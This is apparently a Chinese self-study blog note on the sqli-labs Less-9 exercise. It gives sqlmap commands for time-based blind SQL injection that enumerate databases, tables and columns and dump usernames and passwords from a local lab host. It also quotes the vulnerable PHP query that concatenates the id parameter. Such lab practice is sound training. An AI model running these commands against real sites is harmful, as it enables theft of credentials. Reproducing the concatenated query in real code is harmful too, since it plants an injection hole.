目录
类型
时间盲注-单引号
-dbs枚举数据库
使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T -dbs --batch
太慢,继续优化
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -dbs --batch
这还运行了6分钟,有小伙伴可以更快吗?下方评论,十分感谢!
--tables枚举数据库表
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security --tables --batch
--columns枚举列
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users --columns --batch
--dump枚举数据
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users -C username,password --dump --batch
查看源代码
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
更多内容查看:网络安全-自学笔记
有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。